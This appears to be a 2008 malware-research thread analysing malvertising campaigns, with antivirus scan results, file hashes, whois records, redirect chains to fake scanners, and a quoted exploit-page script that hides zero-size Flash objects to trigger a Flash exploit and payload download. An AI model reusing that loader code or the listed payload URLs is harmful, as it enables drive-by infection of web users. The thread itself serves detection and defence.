Sophos 4.33.0 2008.09.02 Exp/SWFScene-A
Sunbelt 3.1.1592.1 2008.08.30 -
Symantec 10 2008.09.02 Bloodhound.Exploit.193
TheHacker 6.3.0.8.069 2008.09.01 -
TrendMicro 8.700.0.1004 2008.09.02 -
VBA32 3.12.8.4 2008.09.02 -
ViRobot 2008.9.2.1361 2008.09.02 -
VirusBuster 4.5.11.0 2008.09.02 -
Webwasher-Gateway 6.6.2 2008.09.02 Exploit.Flash.Gen

______________________________

Filename: i1.exe

File size: 34304 bytes
MD5...: 41aa2979669cf968802bfcffb5ea9fc0
SHA1..: f84fbc23101c13784b2aea52bf7490858ee07135
SHA256: d36b5d3499f0300f67dc5547f153222eae87c635632e68927312138ec31f0242
PEiD..: -

QUOTE

File i1.exe received on 09.02.2008 18:07:45 (CET)
AhnLab-V3 2008.9.3.0 2008.09.02 -
AntiVir 7.8.1.23 2008.09.02 TR/Drop.Ag.34304.FW
Authentium 5.1.0.4 2008.09.02 -
Avast 4.8.1195.0 2008.09.02 Win32:Trojan-gen {Other}
AVG 8.0.0.161 2008.09.02 Adload_r.AQ
BitDefender 7.2 2008.09.02 -
CAT-QuickHeal 9.50 2008.09.02 (Suspicious) - DNAScan
ClamAV 0.93.1 2008.09.02 -
DrWeb 4.44.0.09170 2008.09.02 -
eSafe 7.0.17.0 2008.09.02 Suspicious File
eTrust-Vet 31.6.6064 2008.09.02 -
Ewido 4.0 2008.09.02 -
F-Prot 4.4.4.56 2008.09.02 -
Fortinet 3.14.0.0 2008.09.02 PossibleThreat
GData 19 2008.09.02 Trojan.Win32.Agent.acao
Ikarus T3.1.1.34.0 2008.09.02 Trojan.Win32.Vundo.V
K7AntiVirus 7.10.437 2008.09.02 -
Kaspersky 7.0.0.125 2008.09.02 Trojan.Win32.Agent.acao
McAfee 5374 2008.09.01 Vundo
Microsoft 1.3807 2008.09.02 Trojan:Win32/Vundo.gen!V
NOD32v2 3407 2008.09.02 Win32/Small.NEB
Norman 5.80.02 2008.09.02 Tibs.gen222
Panda 9.0.0.4 2008.09.02 -
PCTools 4.4.2.0 2008.09.02 -
Prevx1 V2 2008.09.02 Malicious Software
Rising 20.60.11.00 2008.09.02 -
Sophos 4.33.0 2008.09.02 -
Sunbelt 3.1.1592.1 2008.08.30 -
Symantec 10 2008.09.02 Trojan Horse
TheHacker 6.3.0.8.069 2008.09.01 -
TrendMicro 8.700.0.1004 2008.09.02 -
VBA32 3.12.8.4 2008.09.02 -
ViRobot 2008.9.2.1361 2008.09.02 -
VirusBuster 4.5.11.0 2008.09.02 -
Webwasher-Gateway 6.6.2 2008.09.02 Trojan.Drop.Ag.34304.FW

<h4></h4>
bannersrotator.com - 82.98.193.165

Website Title: 403 Forbidden
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-07-31
Expires: 2009-07-31
Updated: 2008-08-05
Name Server: NS13.ZONEEDIT.COM (has 186,960 domains)
Name Server: NS16.ZONEEDIT.COM
Whois Server: whois.publicdomainregistry.com

Server Type: Apache/2.2.6 (Unix) PHP/5.2.4
IP Location - Netherlands - Cyber Technology Bvba/sprl
Dedicated Hosting: bannersrotator.com is hosted on a dedicated server.

Whois Record
Registration Service Provided By: VIVIDS MEDIA GMBH
Contact: +49.3094413291

Domain Name: BANNERSROTATOR.COM

Registrant:
N/A
Jonh Anderson ()
Mulwar str.46
New York
null,12576
US
Tel. +534.347324774

Creation Date: 31-Jul-2008
Expiration Date: 31-Jul-2009

Domain servers in listed order:
ns13.zoneedit.com
ns16.zoneedit.com

Administrative Contact:
N/A
Jonh Anderson ()
Mulwar str.46
New York
null,12576
US
Tel. +534.347324774

Technical Contact:
N/A
Jonh Anderson ()
Mulwar str.46
New York
null,12576
US
Tel. +534.347324774

Billing Contact:
N/A
Jonh Anderson ()
Mulwar str.46
New York
null,12576
US
Tel. +534.347324774
______________________________

92.62.101.13

IP Location: Estonia Starline Web Services
Resolve Host: ds13.esthost.eu

OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: P.O. Box 10096
City: Amsterdam
StateProv:
PostalCode: 1001EB
Country: NL

ReferralServer: whois://whois.ripe.net:43

NetRange: 92.0.0.0 - 92.255.255.255
CIDR: 92.0.0.0/8
NetName: 92-RIPE
NetHandle: NET-92-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: SUNIC.SUNET.SE
NameServer: NS3.NIC.FR
NameServer: NS-EXT.ISC.ORG
NameServer: NS.LACNIC.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at http://www.ripe.net/whois
RegDate: 2007-03-27
Updated: 2007-04-03

== Additional Information From whois://whois.ripe.net:43 ==

inetnum: 92.62.101.0 - 92.62.101.255
netname: STARLINE_EE
descr: Starline Web Services
country: EE
admin-c: VN268-RIPE
tech-c: VN268-RIPE
status: ASSIGNED PA
mnt-by: AS39823-MNT
source: RIPE # Filtered

person: Viktor Norin
address: Pae 21
address: Tallinn
address: Estonia
nic-hdl: VN268-RIPE
phone: +3726370911
abuse-mailbox:
source: RIPE # Filtered

route: 92.62.96.0/20
descr: Compic Ltd.
origin: AS39823
mnt-by: AS3327-MNT
source: RIPE # Filtered

Websites

1. Andromeda-av.com
2. Andromeda-av.net
3. Sevlg.info
4. sevlg.com
5. sevlg.org

Reported here.

<h4></h4>
Two malvertizements are being displayed at www.cnbc.com featuring Winning Surveys - Which Coffee is Better. Fuse Kit 2.1.4. functions where added to the initial Fuse code for these creatives.

Screenshots in situ.

Banners.

spe.atdmt.com/ds/MSMSNMATCVNI/728x90_logo.swf

spe.atdmt.com/ds/MSMSNMATCVNI/300x250_logo.swf

At the time of the write-up the full redirect was inactive.

<h4></h4>
Updated Nancy Drew Solves Mysteries In Style malvertizement. Again no redirect to a fake online scanner but an executable.

Banner.

Redirect.

82.98.235.224/roy/lsd_k12.exe?sid=unknown

______________________________

Filename: lsd_k12.exe

File size: 203776 bytes
MD5...: ab287317da4be2a404a41662cd22f34e
SHA1..: c4cbcea2b441d5f7e2040f7c8aacb84c266d3285
SHA256: 1b34f636ab0dbb9cc585bfd9c2b672c36a2b53a66268221a73a370c0e86bec49
PEiD..: -

QUOTE

File lsd_k12.exe received on 09.20.2008 18:08:10 (CET)
AhnLab-V3 2008.9.19.2 2008.09.19 Win-Trojan/PEPatched.Gen
AntiVir 7.8.1.34 2008.09.19 TR/Spy.Frauder.dk
Authentium 5.1.0.4 2008.09.20 -
Avast 4.8.1195.0 2008.09.19 Win32:Frauder-B
AVG 8.0.0.161 2008.09.20 Downloader.FraudLoad.AC
BitDefender 7.2 2008.09.20 Trojan.FakeAlert.AEB
CAT-QuickHeal 9.50 2008.09.20 Win32.Backdoor.Frauder.dk.4
ClamAV 0.93.1 2008.09.20 -
DrWeb 4.44.0.09170 2008.09.20 Trojan.Packed.639
eSafe 7.0.17.0 2008.09.18 Suspicious File
eTrust-Vet 31.6.6096 2008.09.20 Win32/OnerawCryptorA!generic
Ewido 4.0 2008.09.20 -
F-Prot 4.4.4.56 2008.09.19 -
F-Secure 8.0.14332.0 2008.09.20 Backdoor.Win32.Frauder.dk
Fortinet 3.113.0.0 2008.09.20 -
GData 19 2008.09.20 Backdoor.Win32.Frauder.dk
Ikarus T3.1.1.34.0 2008.09.19 Backdoor.Win32.Frauder.dk
K7AntiVirus 7.10.466 2008.09.20 -
Kaspersky 7.0.0.125 2008.09.20 Backdoor.Win32.Frauder.dk
McAfee 5388 2008.09.19 Downloader-ASH.gen.b
Microsoft 1.3903 2008.09.20 TrojanDownloader:Win32/Renos.AS
NOD32v2 3457 2008.09.19 -
Norman 5.80.02 2008.09.19 W32/Tibs.gen234
Panda 9.0.0.4 2008.09.20 -
PCTools 4.4.2.0 2008.09.20 -
Prevx1 V2 2008.09.20 -
Rising 20.62.52.00 2008.09.20 Backdoor.Win32.Frauder.c
Sophos 4.33.0 2008.09.20 Mal/EncPk-EU
Sunbelt 3.1.1653.1 2008.09.20 -
Symantec 10 2008.09.20 Packed.Generic.186
TheHacker 6.3.0.9.089 2008.09.20 -
TrendMicro 8.700.0.1004 2008.09.20 -
VBA32 3.12.8.5 2008.09.20 -
ViRobot 2008.9.20.1385 2008.09.20 -
VirusBuster 4.5.11.0 2008.09.19 -
Webwasher-Gateway 6.6.2 2008.07.21 Heuristic.Crypted

______________________________

Visible Signs.

O4 - HKLM\..\Run: [lphcepaj0enej] C:\WINDOWS\system32\lphcepaj0enej.exe
O4 - HKLM\..\Run: [SMrhcapaj0enej] C:\Program Files\rhcapaj0enej\rhcapaj0enej.exe

______________________________

Desktop WallPaper.

Fake Antivirus Suite: Antivirus XP 2008.

______________________________

82.98.235.224

Website Title: None given.
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-04-19
Expires: 2009-04-19
Updated: 2008-06-26
Name Server: NS1.DERGAMEND.COM (has 1 domains)
Name Server: NS2.DERGAMEND.COM

Server Type: Apache/2.2.8 (FreeBSD) mod_ssl/2.2.8 OpenSSL/0.9.8e DAV/2 PHP/5.2.5 with Suhosin-Patch
IP Location - Berlin - Berlin - Cyber Technology Bv Ba/sprl
Dedicated Hosting: dergamend.com is hosted on a dedicated server.

Whois Record
Registration Service Provided By: AXENICK, LTD.
Contact: +7.9516440742
Website: hxxp://www.axenick.com

Domain Name: DERGAMEND.COM

Registrant:
n/a
Petrov Dmitry Viktorovich ()
Stroitelei 26 46
Kirishi
Stavropolskiy kray,150020
RU
Tel. +007.9067794465

Creation Date: 19-Apr-2008
Expiration Date: 19-Apr-2009

Domain servers in listed order:
ns2.dergamend.com
ns1.dergamend.com

Administrative Contact:
n/a
Petrov Dmitry Viktorovich ()
Stroitelei 26 46
Kirishi
Stavropolskiy kray,150020
RU
Tel. +007.9067794465

Technical Contact:
n/a
Petrov Dmitry Viktorovich ()
Stroitelei 26 46
Kirishi
Stavropolskiy kray,150020
RU
Tel. +007.9067794465

Billing Contact:
n/a
Petrov Dmitry Viktorovich ()
Stroitelei 26 46
Kirishi
Stavropolskiy kray,150020
RU
Tel. +007.9067794465
______________________________

axp2008.com - 218.106.90.227
anti-virusxp2008.net - 77.244.220.134

<h4></h4>
Possible presence of the "Winning Surveys ... Which Coffee is better" malvertizement on spaces.live.com. On Sep 15 2008 this malicious banner was caught in situ on cnbc.com and at the same period it was served on spaces.live.com as seen on the screenshot in the article about the Presidential Election (spam) Campaign published by Websense.

Windows Live Space is using advertisements from spe.atdmt.com, chance is fairly high we are talking about the same malvertizement, e.g. spe.atdmt.com/ds/MSMSNMATCVNI/728x90_logo.swf
Note the MSMSN part in the folder name ... extreme caution when visiting MSNBC, MSN, hotmail, etc is advised.

<h4></h4>
A very small SWF file first tests your Flash version and will load the corresponding Flash file using LoadMovie().

Filename: ver.swf

File size: 172 bytes
MD5...: 15bffaeeee49c3dd6e436892861802e6
SHA1..: 2c9291a80c0a47a112216ce666b611b3e6e16df4
SHA256: b94c7105b52a8fb672cabda896867baee308d974bbce8dbbb81f912ef2eb66da
PEiD..: -
packers (Kaspersky): Swf2Swc

QUOTE

File ver.swf received on 10.01.2008 15:39:20 (CET)
AhnLab-V3 2008.10.1.0 2008.10.01 -
AntiVir 7.8.1.34 2008.10.01 EXP/Flash.KLI.172
Authentium 5.1.0.4 2008.09.30 -
Avast 4.8.1248.0 2008.10.01 SWF:Downloader
AVG 8.0.0.161 2008.10.01 -
BitDefender 7.2 2008.10.01 -
CAT-QuickHeal 9.50 2008.10.01 -
ClamAV 0.93.1 2008.10.01 -
DrWeb 4.44.0.09170 2008.10.01 -
eSafe 7.0.17.0 2008.10.01 -
eTrust-Vet 31.6.6119 2008.09.30 -
Ewido 4.0 2008.10.01 -
F-Prot 4.4.4.56 2008.09.30 -
F-Secure 8.0.14332.0 2008.10.01 -
Fortinet 3.113.0.0 2008.10.01 -
GData 19 2008.10.01 SWF:Downloader
Ikarus T3.1.1.34.0 2008.10.01 Virus.SWF.Downloader
K7AntiVirus 7.10.479 2008.10.01 -
Kaspersky 7.0.0.125 2008.10.01 -
McAfee 5395 2008.10.01 Generic Downloader.bk
Microsoft 1.4005 2008.10.01 -
NOD32 3485 2008.10.01 SWF/Exploit.CVE-2007-0071
Norman 5.80.02 2008.09.30 -
Panda 9.0.0.4 2008.09.30 -
PCTools 4.4.2.0 2008.10.01 -
Prevx1 V2 2008.10.01 -
Rising 20.63.62.00 2008.09.28 -
SecureWeb-Gateway 6.7.6 2008.10.01 Exploit.Flash.KLI.172
Sophos 4.34.0 2008.10.01 Troj/SWFdlr-Gen
Sunbelt 3.1.1668.1 2008.09.24 -
Symantec 10 2008.10.01 -
TheHacker 6.3.0.9.097 2008.10.01 -
TrendMicro 8.700.0.1004 2008.10.01 -
VBA32 3.12.8.6 2008.09.30 -
ViRobot 2008.10.1.1401 2008.10.01 -
VirusBuster 4.5.11.0 2008.09.30 -

______________________________

Filename: flashVersion + "ff.swf" (WIN_9_0_47_0ff.swf)

File size: 2487 bytes
MD5...: 919f16444f0cf7b47d501c19c27f72a0
SHA1..: ed762c53801846c7943c6e6aba9dac283f3601e2
SHA256: 62683a7b5eb37473c0fdbe3ae5bf459389b0296ab2d18b86b66e91ac43b65c26
PEiD..: -
packers (Kaspersky): Swf2Swc

QUOTE

File WIN_9_0_47_0ff.swf received on 10.01.2008 15:40:36 (CET)
AhnLab-V3 2008.10.1.0 2008.10.01 -
AntiVir 7.8.1.34 2008.10.01 EXP/Flash.Gen
Authentium 5.1.0.4 2008.09.30 -
Avast 4.8.1248.0 2008.10.01 SWF:CVE-2007-0071
BitDefender 7.2 2008.10.01 Exploit.SWF.Gen
CAT-QuickHeal 9.50 2008.10.01 SWF.Exploit
ClamAV 0.93.1 2008.10.01 -
DrWeb 4.44.0.09170 2008.10.01 -
eSafe 7.0.17.0 2008.10.01 -
eTrust-Vet 31.6.6120 2008.10.01 -
Ewido 4.0 2008.10.01 -
F-Prot 4.4.4.56 2008.09.30 -
F-Secure 8.0.14332.0 2008.10.01 -
Fortinet 3.113.0.0 2008.10.01 -
GData 19 2008.10.01 Exploit.SWF.Gen
Ikarus T3.1.1.34.0 2008.10.01 -
K7AntiVirus 7.10.479 2008.10.01 -
Kaspersky 7.0.0.125 2008.10.01 -
McAfee 5395 2008.10.01 -
Microsoft 1.4005 2008.10.01 Exploit:Win32/APSB08-11.gen!A
NOD32 3485 2008.10.01 SWF/Exploit.CVE-2007-0071
Norman 5.80.02 2008.09.30 -
Panda 9.0.0.4 2008.09.30 -
PCTools 4.4.2.0 2008.10.01 -
Prevx1 V2 2008.10.01 -
Rising 20.63.62.00 2008.09.28 -
SecureWeb-Gateway 6.7.6 2008.10.01 Exploit.Flash.Gen
Sophos 4.34.0 2008.10.01 Exp/SWFScene-A
Sunbelt 3.1.1675.1 2008.09.27 -
Symantec 10 2008.10.01 Bloodhound.Exploit.193
TheHacker 6.3.0.9.097 2008.10.01 -
TrendMicro 8.700.0.1004 2008.10.01 -
VBA32 3.12.8.6 2008.09.30 -
ViRobot 2008.10.1.1401 2008.10.01 -
VirusBuster 4.5.11.0 2008.09.30 -

______________________________

www.1ive.net

IP Address: 125.46.57.157
IP Location - Beijing - Beijing - Cncgroup Henan Province Network
Server Type: Microsoft-IIS/6.0
ICANN Registrar: XIN NET TECHNOLOGY CORPORATION
Created: 2007-11-20
Expires: 2008-11-20
Updated: 2007-11-20
Name Server: NS1.72DNS.COM (has 8,602 domains)
Name Server: NS2.72DNS.COM
Whois Server: whois.paycenter.com.cn

<h4></h4>
The webpage first checks if the victim is using Internet Explorer or another browser. If the User Agent is MSIE then i1.html will be loaded, otherwise f2.html is loaded.

Flash version is tested and the appropriate Flash file is loaded. Below is the code from i1.html.

The payload does consist of an executable called rondll32.exe.

Filename: i47swf

File size: 1411 bytes
MD5...: da119e1d0d8c4eb043f64e3eaa9976e4
SHA1..: f7d42b0ea81979dc11b20dd1cce4da4c4ca2548f
SHA256: 180196642853ae304df84ab991f6e9c5c043b1a6d0bd06de7ad2f3e592a7f8b5
PEiD..: -
packers (Kaspersky): Swf2Swc

QUOTE

File i47.swf received on 10.01.2008 16:48:39 (CET)
AhnLab-V3 2008.10.2.0 2008.10.01 -
AntiVir 7.8.1.34 2008.10.01 EXP/Flash.Gen
Authentium 5.1.0.4 2008.09.30 -
Avast 4.8.1248.0 2008.10.01 SWF:CVE-2007-0071
AVG 8.0.0.161 2008.10.01 -
BitDefender 7.2 2008.10.01 -
CAT-QuickHeal 9.50 2008.10.01 SWF.Exploit
ClamAV 0.93.1 2008.10.01 -
DrWeb 4.44.0.09170 2008.10.01 -
eSafe 7.0.17.0 2008.10.01 -
eTrust-Vet 31.6.6119 2008.09.30 -
Ewido 4.0 2008.10.01 -
F-Prot 4.4.4.56 2008.09.30 -
F-Secure 8.0.14332.0 2008.10.01 Exploit.SWF.Downloader.je
Fortinet 3.113.0.0 2008.10.01 -
GData 19 2008.10.01 SWF:CVE-2007-0071
Ikarus T3.1.1.34.0 2008.10.01 Virus.Exploit.SWF.Downloader.je
K7AntiVirus 7.10.479 2008.10.01 -
Kaspersky 7.0.0.125 2008.10.01 Exploit.SWF.Downloader.je
McAfee 5395 2008.10.01 Exploit-CVE2007-0071
Microsoft 1.4005 2008.10.01 Exploit:Win32/APSB08-11.gen!A
NOD32 3486 2008.10.01 SWF/Exploit.CVE-2007-0071
Norman 5.80.02 2008.09.30 -
Panda 9.0.0.4 2008.09.30 -
PCTools 4.4.2.0 2008.10.01 -
Prevx1 V2 2008.10.01 -
Rising 20.63.62.00 2008.09.28 -
SecureWeb-Gateway 6.7.6 2008.10.01 Exploit.Flash.Gen
Sophos 4.34.0 2008.10.01 Troj/SWFExp-I
Sunbelt 3.1.1675.1 2008.09.27 -
Symantec 10 2008.10.01 Downloader.Swif.C
TheHacker 6.3.0.9.097 2008.10.01 -
TrendMicro 8.700.0.1004 2008.10.01 -
VBA32 3.12.8.6 2008.09.30 -
ViRobot 2008.10.1.1401 2008.10.01 -
VirusBuster 4.5.11.0 2008.10.01 -

______________________________

Payload: rondll32.exe

Virustotal Result: 28/36 (77.78%)
Kaspersky: Trojan.Win32.Agent.affi
______________________________

www.ppexe.com

IP Address: 121.11.76.85
IP Location - Guangdong - Guangzhou - Chinanet Guangdong Province Network
Server Type: Microsoft-IIS/6.0
ICANN Registrar: 35 TECHNOLOGY CO., LTD
Created: 2008-08-16
Expires: 2009-08-16
Updated: 2008-08-16
Name Server: NS3.DNS-DIY.COM (has 237,181 domains)
Name Server: NS4.DNS-DIY.COM
Whois Server: whois.35.com

Websites.

1. jjmaobuduo.3322.org
2. jjmaoduo2.3322.org
3. plgou.com
4. ppexe.com
5. www.plgou.com
6. www3.ss11qn.cn
7. xxkk.net

<h4></h4>
I did mention hacked .htaccess files for the first time here. I ran into one myself yesterday. If you visit the website, nothing happens. If you come from a search engine, you are redirected to a fake online scanner.

Network Trace.

CODE

GET /freeasp/ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.google.com/search?hl=en&q=Free+ASP+[removed]&btnG=Google+Search&aq=f&oq=
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.oinko.net
Connection: Keep-Alive

HTTP/1.1 302 Found
Date: Fri, 03 Oct 2008 15:49:19 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
Server: Apache
Location: http://87.248.180.90/in.html?s=ipw2

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://87.248.180.90/in.html?s=ipw2">here</A>.<P>
</BODY></HTML>

Illustration.

• Using Google as a referrer.
  
  
  
  
• No referrer.
  
  

Redirects.

87.248.180.90/in.html?s=ipw2
adaptivetds.name/soft.php?aid=0147&d=1&product=XPA&refer=bb1f0c2b3
computerantiviruspro.com/2009/1/freescan.php?id=880147

<h4></h4>
adaptivetds.name - 216.240.134.211

Website Title: None given.
ICANN Registrar: Directi Internet Solutions Pvt. Ltd. d/b/a PublicDomainRegistry.com
Created: 2008-09-16
Expires: 2009-09-16
Updated: 2008-09-16
Name Server: NS1.STARTED.RU (has 415 domains)
Name Server: NS2.STARTED.RU
Whois Server: whois.publicdomainregistry.com

IP Location - California - Irvine - Go2online Corp
______________________________

computerantiviruspro.com - 84.16.252.138

Website Title: None given.
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-09-09
Expires: 2009-09-09
Updated: 2008-09-26
Name Server: NS1.FREEFASTDNS.COM (has 38 domains)
Name Server: NS2.FREEFASTDNS.COM
Whois Server: whois.estdomains.com

IP Location - Berlin - Berlin - Netdirekt E.k

Whois Record
Registration Service Provider: LovingDomains.com - E-Gold Domain Registration
Website: www.lovingdomains.com
Accept Pecunix, e-Bullion, E-Gold, PayPal, MoneyBookers, WebMoney, Epassporte, Liberty
Reserve, Fethard Finance and Capital Collect

Domain Name: COMPUTERANTIVIRUSPRO.COM

Registrant:
N/A
Maureen Whelan ()
25 Industrial Park Road
Middletown
Connecticut,06457
US
Tel. +860.8072110

domains sharing nameservers

1. bestantivirusscan.com
2. freefastdns.com
3. megatradetds0.com
4. onlineprivatescan.com
5. securedownloadcenter.com
6. winupdates-server.com

Note: onlineprivatescan.com has been mentioned recently on 2 boards being the cause of redirects. Network traces would be highly appreciated if you experience those redirects to fake online scanners. A malicious advertisement may be at the origin of it.
______________________________

onlineprivatescan.com - 216.240.134.208

Website Title: None given.
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-09-10
Expires: 2009-09-10
Updated: 2008-09-26
Registrar Status: clientTransferProhibited
Name Server: NS1.FREEFASTDNS.COM (has 38 domains)
Name Server: NS2.FREEFASTDNS.COM
Whois Server: whois.estdomains.com

IP Address: 216.240.134.208
IP Location - California - Irvine - Go2online Corp

Whois Record
Registration Service Provider: LovingDomains.com - E-Gold Domain Registration
Website: www.lovingdomains.com
Accept Pecunix, e-Bullion, E-Gold, PayPal, MoneyBookers, WebMoney, Epassporte, Liberty
Reserve, Fethard Finance and Capital Collect

Domain Name: ONLINEPRIVATESCAN.COM

Registrant:
N/A
Annette Young-Ogata ()
475 22nd Avenue
Honolulu
Hawaii,96813
US
Tel. +808.5863124

hostnames sharing ip with a-records

1. bestantivirusscan.com
2. googlescanners-360.com
3. protectedtds.name
4. seamastersoft.com
5. trustedpaymenssite.com

domains sharing nameservers

1. bestantivirusscan.com
2. computerantiviruspro.com
3. freefastdns.com
4. megatradetds0.com
5. securedownloadcenter.com
6. winupdates-server.com

<h4></h4>
The Skype malvertizement is being served on www.movizdb.com, not in the "usual way" but through ClickInText which is similar to IntelliTXT and Kontera. They also use those those small ads that slide onto the screen from the left side and thats how the Skype banner was displayed. The advertising company weborama.fr who does host the Skype Flash banner is rather big, so this malvertizement might be seen on several other French websites.

Screenshot in situ.

Banner.

lstatic.weborama.fr/ads/4/20081003/487/153640_weborama300x250.swf

At the time of the writeup, AdopsTools does NOT detect the malicious code inside the banner.

Campaign.

s-tatetstr.com/crossdomain.xml
s-tatetstr.com/c/index.php?id=[removed]
profitabill.com/?cmpid=chutzpahme
adverdaemon.com/?cmp=[removed]
performanceoptimizer.com/.landing?cmp=[removed]

stats.sellmosoft.net/pos_id_performanceoptimizer/poa_mfcchutzpahme_[removed]/stats.php

<h4></h4>
We see a new domain here, s-tatetstr.com. Regular readers will recognize the website title UniqAds ...

s-tatetstr.com - 92.62.100.27

Website Title: UniqAds
ICANN Registrar: TLDS, LLC DBA SRSPLUS
Created: 2008-09-25
Expires: 2009-09-25
Updated: 2008-09-25
Name Server: NS1.S-TATETSTR.COM (has 1 domains)
Name Server: NS2.S-TATETSTR.COM
Whois Server: whois.srsplus.com

IP Location - Estonia - Starline Web Services
Dedicated Hosting: s-tatetstr.com is hosted on a dedicated server.

Registrant:
Sagent Group ()
Sagent Group Ltd.
Guzel street, 45
Belize City, NONE NONE
BZ
698-456-324

Administrative, Technical, Billing Contact:
Sagent Group ()
Sagent Group Ltd.
Guzel street, 45
Belize City, NONE NONE
BZ
698-456-324

Domain Service Provider:
Sagent Group

<h4></h4>
On the website containing the exploit, test if User-Agent is Internet Explorer or not. According to the results, ifff.swf or ffff.swf will be loaded.

CODE

<script>
document.writeln("<script>function init(){window.status=\"\";}window.onload = init;");
document.writeln("window.onerror=function(){return true;}");
document.writeln("");
document.writeln("if(navigator.userAgent.toLowerCase().indexOf(\"msie\")>0)");
document.writeln("{");
document.writeln("document.write(\'<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http:\/\/download.macromedia.com\/pub\/shockwave\/cabs\/flash\/swflash.cab#version=4,0,19,0\" width=\"0\" height=\"0\" align=\"middle\">\');");
document.writeln("document.write(\'<param name=\"allowScriptAccess\" value=\"sameDomain\"\/>\');");
document.writeln("document.write(\'<param name=\"movie\" value=\"ifff.swf\"\/>\');");
document.writeln("document.write(\'<param name=\"quality\" value=\"high\"\/>\');");
document.writeln("document.write(\'<param name=\"bgcolor\" value=\"#ffffff\"\/>\');");
document.writeln("document.write(\'<embed src=\"ifff.swf\"\/>\');");
document.writeln("document.write(\'<\/object>\');");
document.writeln("}");
document.writeln("else{document.write(\'<EMBED src=\"ffff.swf\" width=0 height=0>\');}");
document.writeln("<\/script>")
</script>

ifff.swf contains an actionscript to load another small swf file based on the Flash version detected.

ly20088.asp?gameee=WIN_9_0_47_0 contains malicious code triggering the download & execution of x.exe - saved as orz.exe on the computer.

<h4></h4>
Filename: ifff.swf

Additional information
File size: 122 bytes
MD5...: 633d962b78a661a26467cf7533ed3803
SHA1..: c82e40f5c8fee27afb9bb4f84d3306bd39a57fa3
SHA256: c879317d0b7fef81e373993af7208d5a9e1c2306058bbf3420846cd2d05d82ff

QUOTE

File ifff.swf received on 10.09.2008 18:58:23 (CET)
AhnLab-V3 2008.10.10.0 2008.10.09 -
AntiVir 7.8.1.34 2008.10.09 -
Authentium 5.1.0.4 2008.10.09 -
Avast 4.8.1248.0 2008.10.09 -
AVG 8.0.0.161 2008.10.09 -
BitDefender 7.2 2008.10.09 -
CAT-QuickHeal 9.50 2008.10.08 -
ClamAV 0.93.1 2008.10.09 -
DrWeb 4.44.0.09170 2008.10.09 -
eSafe 7.0.17.0 2008.10.08 -
eTrust-Vet 31.6.6137 2008.10.09 -
Ewido 4.0 2008.10.09 -
F-Prot 4.4.4.56 2008.10.08 -
F-Secure 8.0.14332.0 2008.10.09 -
Fortinet 3.113.0.0 2008.10.09 -
GData 19 2008.10.09 -
Ikarus T3.1.1.34.0 2008.10.09 -
K7AntiVirus 7.10.489 2008.10.09 -
Kaspersky 7.0.0.125 2008.10.09 -
McAfee 5401 2008.10.09 -
Microsoft 1.4005 2008.10.09 -
NOD32 3507 2008.10.09 -
Norman 5.80.02 2008.10.09 -
Panda 9.0.0.4 2008.10.09 -
PCTools 4.4.2.0 2008.10.09 -
Prevx1 V2 2008.10.09 -
Rising 20.65.32.00 2008.10.09 -
SecureWeb-Gateway 6.7.6 2008.10.09 -
Sophos 4.34.0 2008.10.09 -
Sunbelt 3.1.1708.1 2008.10.09 -
Symantec 10 2008.10.09 -
TheHacker 6.3.1.0.103 2008.10.07 -
TrendMicro 8.700.0.1004 2008.10.09 -
VBA32 3.12.8.6 2008.10.09 -
ViRobot 2008.10.9.1414 2008.10.09 -
VirusBuster 4.5.11.0 2008.10.09 -

______________________________

Filename: ly20088.asp_gameee_WIN_9_0_47_0.swf

Additional information
File size: 2581 bytes
MD5...: f04f725a581f75337c1be515dca6d70f
SHA1..: 12ffb37e77b15e666da5beaf085593db3e862773
SHA256: 41af249cfc8b58fa4ee55b5f52daee5d16d950ffd03dcc1f788d53368b00fc30
packers (Kaspersky): Swf2Swc

QUOTE

File ly20088.asp_gameee_WIN_9_0_47_0.s received on 10.09.2008 18:59:46 (CET)
AhnLab-V3 2008.10.10.0 2008.10.09 -
AntiVir 7.8.1.34 2008.10.09 EXP/Flash.Gen
Authentium 5.1.0.4 2008.10.09 -
Avast 4.8.1248.0 2008.10.09 SWF:CVE-2007-0071
AVG 8.0.0.161 2008.10.09 -
BitDefender 7.2 2008.10.09 Exploit.SWF.Gen
CAT-QuickHeal 9.50 2008.10.08 SWF.Exploit
ClamAV 0.93.1 2008.10.09 -
DrWeb 4.44.0.09170 2008.10.09 -
eSafe 7.0.17.0 2008.10.08 -
eTrust-Vet 31.6.6137 2008.10.09 -
Ewido 4.0 2008.10.09 -
F-Prot 4.4.4.56 2008.10.08 -
F-Secure 8.0.14332.0 2008.10.09 -
Fortinet 3.113.0.0 2008.10.09 -
GData 19 2008.10.09 Exploit.SWF.Gen
Ikarus T3.1.1.34.0 2008.10.09 -
K7AntiVirus 7.10.489 2008.10.09 -
Kaspersky 7.0.0.125 2008.10.09 -
McAfee 5401 2008.10.09 -
Microsoft 1.4005 2008.10.09 Exploit:Win32/APSB08-11.gen!A
NOD32 3507 2008.10.09 -
Norman 5.80.02 2008.10.09 -
Panda 9.0.0.4 2008.10.09 -
PCTools 4.4.2.0 2008.10.09 -
Prevx1 V2 2008.10.09 -
Rising 20.65.32.00 2008.10.09 -
SecureWeb-Gateway 6.7.6 2008.10.09 Exploit.Flash.Gen
